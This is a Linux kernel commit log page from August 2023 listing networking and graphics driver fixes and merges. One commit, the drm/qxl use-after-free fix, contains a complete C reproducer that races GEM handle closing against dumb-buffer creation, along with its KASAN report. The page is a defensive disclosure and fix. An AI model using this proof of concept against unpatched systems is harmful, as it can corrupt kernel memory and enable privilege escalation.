1. 23 Aug, 2023 4 commits
  2. 22 Aug, 2023 6 commits
  3. 21 Aug, 2023 2 commits
    • Ping-Ke Shih's avatar
      wifi: mac80211: limit reorder_buf_filtered to avoid UBSAN warning · b98c1610
      Ping-Ke Shih authored
      The commit 06470f74 ("mac80211: add API to allow filtering frames in BA sessions")
      added reorder_buf_filtered to mark frames filtered by firmware, and it
      can only work correctly if hw.max_rx_aggregation_subframes <= 64 since
      it stores the bitmap in a u64 variable.
      
      However, new HE or EHT devices can support BlockAck number up to 256 or
      1024, and then using a higher subframe index leads UBSAN warning:
      
       UBSAN: shift-out-of-bounds in net/mac80211/rx.c:1129:39
       shift exponent 215 is too large for 64-bit type 'long long unsigned int'
       Call Trace:
        <IRQ>
        dump_stack_lvl+0x48/0x70
        dump_stack+0x10/0x20
        __ubsan_handle_shift_out_of_bounds+0x1ac/0x360
        ieee80211_release_reorder_frame.constprop.0.cold+0x64/0x69 [mac80211]
        ieee80211_sta_reorder_release+0x9c/0x400 [mac80211]
        ieee80211_prepare_and_rx_handle+0x1234/0x1420 [mac80211]
        ieee80211_rx_list+0xaef/0xf60 [mac80211]
        ieee80211_rx_napi+0x53/0xd0 [mac80211]
      
      Since only old hardware that supports <=64 BlockAck uses
      ieee80211_mark_rx_ba_filtered_frames(), limit the use as it is, so add a
      WARN_ONCE() and comment to note to avoid using this function if hardware
      capability is not suitable.
      Signed-off-by: default avatarPing-Ke Shih <pkshih@realtek.com>
      Link: https://lore.kernel.org/r/20230818014004.16177-1-pkshih@realtek.com
      [edit commit message]
      Signed-off-by: default avatarJohannes Berg <johannes.berg@intel.com>
      b98c1610
    • Sabrina Dubroca's avatar
      MAINTAINERS: add entry for macsec · d1cdbf66
      Sabrina Dubroca authored
      Jakub asked if I'd be willing to be the maintainer of the macsec code
      and review the driver code adding macsec offload, so let's add the
      corresponding entry.
      
      The keyword lines are meant to catch selftests and patches adding HW
      offload support to other drivers.
      Suggested-by: default avatarJakub Kicinski <kuba@kernel.org>
      Signed-off-by: default avatarSabrina Dubroca <sd@queasysnail.net>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      d1cdbf66
  4. 20 Aug, 2023 6 commits
    • Anh Tuan Phan's avatar
      selftests/net: Add log.txt and tools to .gitignore · 144e22e7
      Anh Tuan Phan authored
      Update .gitignore to untrack tools directory and log.txt. "tools" is
      generated in "selftests/net/Makefile" and log.txt is generated in
      "selftests/net/gro.sh" when executing run_all_tests.
      Signed-off-by: default avatarAnh Tuan Phan <tuananhlfc@gmail.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      144e22e7
    • Eric Dumazet's avatar
      ipv4: fix data-races around inet->inet_id · f866fbc8
      Eric Dumazet authored
      UDP sendmsg() is lockless, so ip_select_ident_segs()
      can very well be run from multiple cpus [1]
      
      Convert inet->inet_id to an atomic_t, but implement
      a dedicated path for TCP, avoiding cost of a locked
      instruction (atomic_add_return())
      
      Note that this patch will cause a trivial merge conflict
      because we added inet->flags in net-next tree.
      
      v2: added missing change in
      drivers/net/ethernet/chelsio/inline_crypto/chtls/chtls_cm.c
      (David Ahern)
      
      [1]
      
      BUG: KCSAN: data-race in __ip_make_skb / __ip_make_skb
      
      read-write to 0xffff888145af952a of 2 bytes by task 7803 on cpu 1:
      ip_select_ident_segs include/net/ip.h:542 [inline]
      ip_select_ident include/net/ip.h:556 [inline]
      __ip_make_skb+0x844/0xc70 net/ipv4/ip_output.c:1446
      ip_make_skb+0x233/0x2c0 net/ipv4/ip_output.c:1560
      udp_sendmsg+0x1199/0x1250 net/ipv4/udp.c:1260
      inet_sendmsg+0x63/0x80 net/ipv4/af_inet.c:830
      sock_sendmsg_nosec net/socket.c:725 [inline]
      sock_sendmsg net/socket.c:748 [inline]
      ____sys_sendmsg+0x37c/0x4d0 net/socket.c:2494
      ___sys_sendmsg net/socket.c:2548 [inline]
      __sys_sendmmsg+0x269/0x500 net/socket.c:2634
      __do_sys_sendmmsg net/socket.c:2663 [inline]
      __se_sys_sendmmsg net/socket.c:2660 [inline]
      __x64_sys_sendmmsg+0x57/0x60 net/socket.c:2660
      do_syscall_x64 arch/x86/entry/common.c:50 [inline]
      do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x63/0xcd
      
      read to 0xffff888145af952a of 2 bytes by task 7804 on cpu 0:
      ip_select_ident_segs include/net/ip.h:541 [inline]
      ip_select_ident include/net/ip.h:556 [inline]
      __ip_make_skb+0x817/0xc70 net/ipv4/ip_output.c:1446
      ip_make_skb+0x233/0x2c0 net/ipv4/ip_output.c:1560
      udp_sendmsg+0x1199/0x1250 net/ipv4/udp.c:1260
      inet_sendmsg+0x63/0x80 net/ipv4/af_inet.c:830
      sock_sendmsg_nosec net/socket.c:725 [inline]
      sock_sendmsg net/socket.c:748 [inline]
      ____sys_sendmsg+0x37c/0x4d0 net/socket.c:2494
      ___sys_sendmsg net/socket.c:2548 [inline]
      __sys_sendmmsg+0x269/0x500 net/socket.c:2634
      __do_sys_sendmmsg net/socket.c:2663 [inline]
      __se_sys_sendmmsg net/socket.c:2660 [inline]
      __x64_sys_sendmmsg+0x57/0x60 net/socket.c:2660
      do_syscall_x64 arch/x86/entry/common.c:50 [inline]
      do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x63/0xcd
      
      value changed: 0x184d -> 0x184e
      
      Reported by Kernel Concurrency Sanitizer on:
      CPU: 0 PID: 7804 Comm: syz-executor.1 Not tainted 6.5.0-rc6-syzkaller #0
      Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023
      ==================================================================
      
      Fixes: 23f57406 ("ipv4: avoid using shared IP generator for connected sockets")
      Reported-by: default avatarsyzbot <syzkaller@googlegroups.com>
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Reviewed-by: default avatarDavid Ahern <dsahern@kernel.org>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      f866fbc8
    • Jakub Kicinski's avatar
      net: validate veth and vxcan peer ifindexes · f534f658
      Jakub Kicinski authored
      veth and vxcan need to make sure the ifindexes of the peer
      are not negative, core does not validate this.
      
      Using iproute2 with user-space-level checking removed:
      
      Before:
      
        # ./ip link add index 10 type veth peer index -1
        # ip link show
        1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
          link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000
          link/ether 52:54:00:74:b2:03 brd ff:ff:ff:ff:ff:ff
        10: veth1@veth0: <BROADCAST,MULTICAST,M-DOWN> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
          link/ether 8a:90:ff:57:6d:5d brd ff:ff:ff:ff:ff:ff
        -1: veth0@veth1: <BROADCAST,MULTICAST,M-DOWN> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
          link/ether ae:ed:18:e6:fa:7f brd ff:ff:ff:ff:ff:ff
      
      Now:
      
        $ ./ip link add index 10 type veth peer index -1
        Error: ifindex can't be negative.
      
      This problem surfaced in net-next because an explicit WARN()
      was added, the root cause is older.
      
      Fixes: e6f8f1a7 ("veth: Allow to create peer link with given ifindex")
      Fixes: a8f820a3 ("can: add Virtual CAN Tunnel driver (vxcan)")
      Reported-by: syzbot+5ba06978f34abb058571@syzkaller.appspotmail.com
      Signed-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      Reviewed-by: default avatarEric Dumazet <edumazet@google.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      f534f658
    • David S. Miller's avatar
      Merge branch 'fixed_phy_register-return-value' · c727c6f7
      David S. Miller authored
      Ruan Jinjie says:
      
      ====================
      net: Fix return value check for fixed_phy_register()
      
      The fixed_phy_register() function returns error pointers and never
      returns NULL. Update the checks accordingly.
      
      Changes in v3:
      - Drop the error fix patch for fixed_phy_get_gpiod().
      - Split the error code update code into another patch set as suggested.
      - Update the commit title and message.
      ====================
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      c727c6f7
    • Ruan Jinjie's avatar
      net: bcmgenet: Fix return value check for fixed_phy_register() · 32bbe64a
      Ruan Jinjie authored
      The fixed_phy_register() function returns error pointers and never
      returns NULL. Update the checks accordingly.
      
      Fixes: b0ba512e ("net: bcmgenet: enable driver to work without a device tree")
      Signed-off-by: default avatarRuan Jinjie <ruanjinjie@huawei.com>
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Acked-by: default avatarDoug Berger <opendmb@gmail.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      32bbe64a
    • Ruan Jinjie's avatar
      net: bgmac: Fix return value check for fixed_phy_register() · 23a14488
      Ruan Jinjie authored
      The fixed_phy_register() function returns error pointers and never
      returns NULL. Update the checks accordingly.
      
      Fixes: c25b23b8 ("bgmac: register fixed PHY for ARM BCM470X / BCM5301X chipsets")
      Signed-off-by: default avatarRuan Jinjie <ruanjinjie@huawei.com>
      Reviewed-by: default avatarAndrew Lunn <andrew@lunn.ch>
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      23a14488
  5. 19 Aug, 2023 14 commits
  6. 18 Aug, 2023 4 commits
    • Hariprasad Kelam's avatar
      octeontx2-af: SDP: fix receive link config · 05f3d5bc
      Hariprasad Kelam authored
      On SDP interfaces, frame oversize and undersize errors are
      observed as driver is not considering packet sizes of all
      subscribers of the link before updating the link config.
      
      This patch fixes the same.
      
      Fixes: 9b7dd87a ("octeontx2-af: Support to modify min/max allowed packet lengths")
      Signed-off-by: default avatarHariprasad Kelam <hkelam@marvell.com>
      Signed-off-by: default avatarSunil Goutham <sgoutham@marvell.com>
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Link: https://lore.kernel.org/r/20230817063006.10366-1-hkelam@marvell.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      05f3d5bc
    • Jakub Kicinski's avatar
      Merge tag 'batadv-net-pullrequest-20230816' of git://git.open-mesh.org/linux-merge · 7793a88e
      Jakub Kicinski authored
      Simon Wunderlich says:
      
      ====================
      Here are some batman-adv bugfixes:
      
       - Fix issues with adjusted MTUs (2 patches), by Sven Eckelmann
      
       - Fix header access for memory reallocation case, by Remi Pommarel
      
       - Fix two memory leaks (2 patches), by Remi Pommarel
      
      * tag 'batadv-net-pullrequest-20230816' of git://git.open-mesh.org/linux-merge:
        batman-adv: Fix batadv_v_ogm_aggr_send memory leak
        batman-adv: Fix TT global entry leak when client roamed back
        batman-adv: Do not get eth header before batadv_check_management_packet
        batman-adv: Don't increase MTU when set by user
        batman-adv: Trigger events for auto adjusted MTU
      ====================
      
      Link: https://lore.kernel.org/r/20230816163318.189996-1-sw@simonwunderlich.deSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      7793a88e
    • Linus Torvalds's avatar
      Merge tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net · 0e8860d2
      Linus Torvalds authored
      Pull networking fixes from Jakub Kicinski:
       "Including fixes from ipsec and netfilter.
      
        No known outstanding regressions.
      
        Fixes to fixes:
      
         - virtio-net: set queues after driver_ok, avoid a potential race
           added by recent fix
      
         - Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
           when VLAN 0 is registered explicitly
      
         - nf_tables:
            - fix false-positive lockdep splat in recent fixes
            - don't fail inserts if duplicate has expired (fix test failures)
            - fix races between garbage collection and netns dismantle
      
        Current release - new code bugs:
      
         - mlx5: Fix mlx5_cmd_update_root_ft() error flow
      
        Previous releases - regressions:
      
         - phy: fix IRQ-based wake-on-lan over hibernate / power off
      
        Previous releases - always broken:
      
         - sock: fix misuse of sk_under_memory_pressure() preventing system
           from exiting global TCP memory pressure if a single cgroup is under
           pressure
      
         - fix the RTO timer retransmitting skb every 1ms if linear option is
           enabled
      
         - af_key: fix sadb_x_filter validation, amment netlink policy
      
         - ipsec: fix slab-use-after-free in decode_session6()
      
         - macb: in ZynqMP resume always configure PS GTR for non-wakeup
           source
      
        Misc:
      
         - netfilter: set default timeout to 3 secs for sctp shutdown send and
           recv state (from 300ms), align with protocol timers"
      
      * tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net: (49 commits)
        ice: Block switchdev mode when ADQ is active and vice versa
        qede: fix firmware halt over suspend and resume
        net: do not allow gso_size to be set to GSO_BY_FRAGS
        sock: Fix misuse of sk_under_memory_pressure()
        sfc: don't fail probe if MAE/TC setup fails
        sfc: don't unregister flow_indr if it was never registered
        net: dsa: mv88e6xxx: Wait for EEPROM done before HW reset
        net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
        net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
        ipv6: fix indentation of a config attribute
        mailmap: add entries for Simon Horman
        broadcom: b44: Use b44_writephy() return value
        net: openvswitch: reject negative ifindex
        team: Fix incorrect deletion of ETH_P_8021AD protocol vid from slaves
        net: phy: broadcom: stub c45 read/write for 54810
        netfilter: nft_dynset: disallow object maps
        netfilter: nf_tables: GC transaction race with netns dismantle
        netfilter: nf_tables: fix GC transaction races with netns and netlink event exit path
        ...
      0e8860d2
    • Linus Torvalds's avatar
      Merge tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm · 1ada9c07
      Linus Torvalds authored
      Pull drm fixes from Dave Airlie:
       "Regular enough week, mostly the usual amdgpu and i915 fixes.  Also
        qaic, nouveau, qxl and a revert for an EDID patch that had some side
        effects, along with a couple of panel fixes.
      
        edid:
         - revert mode parsing fix that had side effects.
      
        i915:
         - Fix the flow for ignoring GuC SLPC efficient frequency selection
         - Fix SDVO panel_type initialization
         - Fix display probe for IVB Q and IVB D GT2 server
      
        nouveau:
         - fix use-after-free in connector code
      
        qaic:
         - integer overflow check fix
         - fix slicing memory leak
      
        panel:
         - fix JDI LT070ME05000 probing
         - fix AUO G121EAN01 timings
      
        amdgpu:
         - SMU 13.x fixes
         - Fix mcbp parameter for gfx9
         - SMU 11.x fixes
         - Temporary fix for large numbers of XCP partitions
         - S0ix fixes
         - DCN 2.0 fix
      
        qxl:
         - fix use after free race in dumb object allocation"
      
      * tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm:
        drm/qxl: fix UAF on handle creation
        Revert "drm/edid: Fix csync detailed mode parsing"
        drm/nouveau/disp: fix use-after-free in error handling of nouveau_connector_create
        Revert "Revert "drm/amdgpu/display: change pipe policy for DCN 2.0""
        drm/amd: flush any delayed gfxoff on suspend entry
        drm/amdgpu: skip fence GFX interrupts disable/enable for S0ix
        drm/amdgpu: skip xcp drm device allocation when out of drm resource
        drm/amd/pm: Update pci link width for smu v13.0.6
        drm/amd/pm: Fix temperature unit of SMU v13.0.6
        drm/amdgpu/pm: fix throttle_status for other than MP1 11.0.7
        drm/amdgpu: disable mcbp if parameter zero is set
        drm/amd/pm: disallow the fan setting if there is no fan on smu 13.0.0
        accel/qaic: Clean up integer overflow checking in map_user_pages()
        accel/qaic: Fix slicing memory leak
        drm/i915: fix display probe for IVB Q and IVB D GT2 server
        drm/i915/sdvo: fix panel_type initialization
        drm/i915/guc/slpc: Restore efficient freq earlier
        drm/panel: simple: Fix AUO G121EAN01 panel timings according to the docs
        drm/panel: JDI LT070ME05000 simplify with dev_err_probe()
      1ada9c07
  7. 17 Aug, 2023 4 commits
    • Jakub Kicinski's avatar
      Merge branch '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue · 820a38d8
      Jakub Kicinski authored
      Tony Nguyen says:
      
      ====================
      Intel Wired LAN Driver Updates 2023-08-16 (iavf, i40e)
      
      This series contains updates to iavf and i40e drivers.
      
      Piotr adds checks for unsupported Flow Director rules on iavf.
      
      Andrii replaces incorrect 'write' messaging on read operations for i40e.
      
      * '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue:
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
      ====================
      
      Link: https://lore.kernel.org/r/20230816193308.1307535-1-anthony.l.nguyen@intel.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      820a38d8
    • Wander Lairson Costa's avatar
      drm/qxl: fix UAF on handle creation · c611589b
      Wander Lairson Costa authored
      qxl_mode_dumb_create() dereferences the qobj returned by
      qxl_gem_object_create_with_handle(), but the handle is the only one
      holding a reference to it.
      
      A potential attacker could guess the returned handle value and closes it
      between the return of qxl_gem_object_create_with_handle() and the qobj
      usage, triggering a use-after-free scenario.
      
      Reproducer:
      
      int dri_fd =-1;
      struct drm_mode_create_dumb arg = {0};
      
      void gem_close(int handle);
      
      void* trigger(void* ptr)
      {
      	int ret;
      	arg.width = arg.height = 0x20;
      	arg.bpp = 32;
      	ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
      	if(ret)
      	{
      		perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      		exit(-1);
      	}
      	gem_close(arg.handle);
      	while(1) {
      		struct drm_mode_create_dumb args = {0};
      		args.width = args.height = 0x20;
      		args.bpp = 32;
      		ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
      		if (ret) {
      			perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      			exit(-1);
      		}
      
      		printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
      		gem_close(args.handle);
      	}
      	return NULL;
      }
      
      void gem_close(int handle)
      {
      	struct drm_gem_close args;
      	args.handle = handle;
      	int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
      	if (!ret)
      		printf("gem close handle %d\n", args.handle);
      }
      
      int main(void)
      {
      	dri_fd= open("/dev/dri/card0", O_RDWR);
      	printf("fd:%d\n", dri_fd);
      
      	if(dri_fd == -1)
      		return -1;
      
      	pthread_t tid1;
      
      	if(pthread_create(&tid1,NULL,trigger,NULL)){
      		perror("[*] thread_create tid1\n");
      		return -1;
      	}
      	while (1)
      	{
      		gem_close(arg.handle);
      	}
      	return 0;
      }
      
      This is a KASAN report:
      
      ==================================================================
      BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      Write of size 1 at addr ffff88801136c240 by task poc/515
      
      CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
      Call Trace:
      <TASK>
      __dump_stack linux/lib/dump_stack.c:88
      dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
      print_address_description linux/mm/kasan/report.c:319
      print_report+0xd2/0x660 linux/mm/kasan/report.c:430
      kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
      __asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
      qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      RIP: 0033:0x7ff5004ff5f7
      Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48
      
      RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
      RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
      RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
      RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
      R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
      R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
      </TASK>
      
      Allocated by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
      ____kasan_kmalloc linux/mm/kasan/common.c:374
      __kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
      kasan_kmalloc linux/./include/linux/kasan.h:196
      kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
      kmalloc linux/./include/linux/slab.h:580
      kzalloc linux/./include/linux/slab.h:720
      qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
      qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
      qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      Freed by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
      ____kasan_slab_free linux/mm/kasan/common.c:236
      ____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
      __kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
      kasan_slab_free linux/./include/linux/kasan.h:162
      slab_free_hook linux/mm/slub.c:1781
      slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
      slab_free linux/mm/slub.c:3787
      __kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
      kfree+0x78/0x120 linux/mm/slab_common.c:1019
      qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
      ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
      kref_put linux/./include/linux/kref.h:65
      ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
      qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
      drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
      kref_put linux/./include/linux/kref.h:65
      __drm_gem_object_put linux/./include/drm/drm_gem.h:431
      drm_gem_object_put linux/./include/drm/drm_gem.h:444
      qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      The buggy address belongs to the object at ffff88801136c000
      which belongs to the cache kmalloc-1k of size 1024
      The buggy address is located 576 bytes inside of
      freed 1024-byte region [ffff88801136c000, ffff88801136c400)
      
      The buggy address belongs to the physical page:
      page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
      head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
      flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
      raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
      raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
      page dumped because: kasan: bad access detected
      
      Memory state around the buggy address:
      ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      >ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ^
      ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ==================================================================
      Disabling lock debugging due to kernel taint
      
      Instead of returning a weak reference to the qxl_bo object, return the
      created drm_gem_object and let the caller decrement the reference count
      when it no longer needs it. As a convenience, if the caller is not
      interested in the gobj object, it can pass NULL to the parameter and the
      reference counting is descremented internally.
      
      The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
      
      Link: https://www.zerodayinitiative.com/Signed-off-by: default avatarWander Lairson Costa <wander@redhat.com>
      Cc: stable@vger.kernel.org
      Reviewed-by: default avatarDave Airlie <airlied@redhat.com>
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
      c611589b
    • Dave Airlie's avatar
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of... · 68c60b34
      Dave Airlie authored
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of https://gitlab.freedesktop.org/agd5f/linux into drm-fixes
      
      amd-drm-fixes-6.5-2023-08-16:
      
      amdgpu:
      - SMU 13.x fixes
      - Fix mcbp parameter for gfx9
      - SMU 11.x fixes
      - Temporary fix for large numbers of XCP partitions
      - S0ix fixes
      - DCN 2.0 fix
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Alex Deucher <alexander.deucher@amd.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230816200226.10771-1-alexander.deucher@amd.com
      68c60b34
    • Dave Airlie's avatar
      Merge tag 'drm-misc-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-misc into drm-fixes · be48306f
      Dave Airlie authored
      One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for
      the AUO G121EAN01 panel, an integer overflow and a memory leak fixes for
      the qaic accel, a use-after-free fix for nouveau and a revert for an
      alleged fix in EDID parsing.
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Maxime Ripard <mripard@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/3olqt33em5uhxzjbqghwcwnvmw73h7bxkbdxookmnkecymd4vc@7ogm6gewpprq
      be48306f